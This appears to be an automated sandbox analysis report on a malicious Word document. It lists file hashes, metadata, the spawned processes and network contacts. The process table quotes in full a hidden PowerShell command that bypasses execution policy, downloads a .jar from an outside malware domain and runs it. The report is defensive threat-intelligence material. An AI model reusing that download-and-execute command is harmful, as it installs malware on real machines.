File name: | a6051488868fe29523765f75c59f0819d47f4a825e5ced0b215c17d0d3205b13.docx |
Full analysis: | https://app.any.run/tasks/a0656427-4c36-418c-bffa-3090fe4e8a28 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 09:34:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 126110DF5BF005FC55BFF373AD48E6B9 |
SHA1: | 8C2530F320554F60D4DDD251841D34107C79E25A |
SHA256: | A6051488868FE29523765F75C59F0819D47F4A825E5CED0B215C17D0D3205B13 |
SSDEEP: | 768:5xH8ijLe6Oi5MpKMD0ylMkBlwCfugps5okZWV/:X8C2WyukDSFi |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x1a34d400 |
ZipCompressedSize: | 398 |
ZipUncompressedSize: | 1510 |
ZipFileName: | [Content_Types].xml |
Template: | Normal.dotm |
---|---|
TotalEditTime: | - |
Pages: | 1 |
Words: | 3 |
Characters: | 22 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
Company: | TESTER |
LinksUpToDate: | No |
CharactersWithSpaces: | 24 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 12 |
Keywords: | - |
LastModifiedBy: | TESTER |
RevisionNumber: | 2 |
CreateDate: | 2018:12:26 06:56:00Z |
ModifyDate: | 2018:12:26 06:56:00Z |
Title: | - |
Subject: | - |
Creator: | TESTER |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a6051488868fe29523765f75c59f0819d47f4a825e5ced0b215c17d0d3205b13.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2752 | "C:\Windows\system32\verclsid.exe" /S /C {00020820-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5 | C:\Windows\system32\verclsid.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extension CLSID Verification Host Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3896 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2536 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3508 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://zavayo.mobi\" ,\" %temp%\\Mif8V1.jar\") }" & %temp%\\Mif8V1.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4016 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://zavayo.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\Mif8V1.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB9AB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59E03281.png | — | |
MD5:— | SHA256:— | |||
3896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRFE45.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2536 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR376.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TP23MNRPL7C86OORJDTJ.temp | — | |
MD5:— | SHA256:— | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$051488868fe29523765f75c59f0819d47f4a825e5ced0b215c17d0d3205b13.docx | pgc | |
MD5:4721C7174019CC4233859FCAA7314C1B | SHA256:A7D9A129EB1A4AA8B50CE2CC9ED7C2081C613CBC4AB4DB875D4FA99658CBC6A1 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\1144.xls | text | |
MD5:4880168319FC3578BF92A90D9CED1089 | SHA256:7A6F2ED7A3BF9832A134E1DCD1532D7B612D787118180E3AE44906BC2D6BDE03 | |||
4016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9B4924A0B2D127F785DF943EB392383B | SHA256:956FE20F31605A99DECE959F1B8C679BD7A7EAAB6569625A0F2E50CE52EB7823 | |||
4016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1826ec.TMP | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4016 | powershell.exe | GET | — | 23.254.225.209:80 | http://zavayo.mobi/ | US | — | — | unknown |
4016 | powershell.exe | GET | — | 23.254.225.209:80 | http://zavayo.mobi/ | US | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4016 | powershell.exe | 23.254.225.209:80 | zavayo.mobi | Hostwinds LLC. | US | unknown |
Domain | IP | Reputation |
---|---|---|
zavayo.mobi | | unknown |